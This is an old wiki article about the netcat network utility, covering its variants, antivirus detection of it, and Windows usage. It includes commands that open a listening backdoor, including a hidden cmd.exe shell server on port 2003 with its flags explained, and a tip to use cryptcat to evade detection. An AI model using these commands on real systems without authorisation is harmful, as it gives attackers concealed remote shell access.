Netcat

From Free Knowledge Base- The DUCK Project: information for everyone
Revision as of 08:32, 10 August 2007 by Admin (Talk | contribs)

Jump to: navigation, search

Netcat has been described as "a buffed up version of telnet that has many options that allow it to do many things" and "the TCP/IP swiss army knife." Some erroneously label it a hacker's tool, while many consider it a network engineer's right hand.

An article describing Netcat usage:

The original version of netcat was written for UNIX. Another version exists which is a rewrite, called GNU netcat.

  • Original UNIX netcat
  • GNU netcat
  • Cryptcat
  • Socat

note: Unless compiled with the "GAPING_SECURITY_HOLE" flag, netcat is harmless to have on your system (as this flag is what enables netcat to execute other programs).

The most likely feature of netcat to be used as a security exploit is the ability to run as both a server and a client. It is rather simple to include netcat into any application you write then execute:

   nc -l -p #port-number

and you have a backdoor in the system.

Symantec detecting Netcat as a "hack tool"

12/15/05 - Symantec is now detecting Netcat as HackTool.NetCat. The default action of Norton AntiVirus is to delete the program so be careful that it doesn't get removed. Netcat is no more an attack tool than any file transfer or remote access program. It does not exploit any vulnerability, contain any malicious code, or attempt to hide its presence. It is ironic that Symantec lists netcat on their own security tools library where it is described as, "Windows NT/9x Netcat is the port of the simple Unix utility which reads and writes data across network connections, using TCP or UDP transport protocols."

To avoid detection (if you are testing it as a backdoor) use cryptcat.

"Cryptcat is the standard netcat enhanced with twofish encryption."

 

netcat windows usage

  • Unizip the netcat archive and extract nc.exe
  • Copy nc.exe to C:\WINDOWS\System32 or C:\WINNT\System32

netcat works a lot like telnet. at the command prompt type:

nc <ip-address> <port>

Now as a server...

The following command will create a shell server on a Windows machine:

nc -L -d -p 2003 -t -e cmd.exe

This will open a MS-DOS shell when connected to at port 2003.

-L - stay open and listen as a server
-d - detach (don't open up a window when listening / stay hidden)
-p - listen on the specified port
-t - accept telnet connections
-e cmd.exe - open up cmd.exe (the MS-DOS shell) when user is connected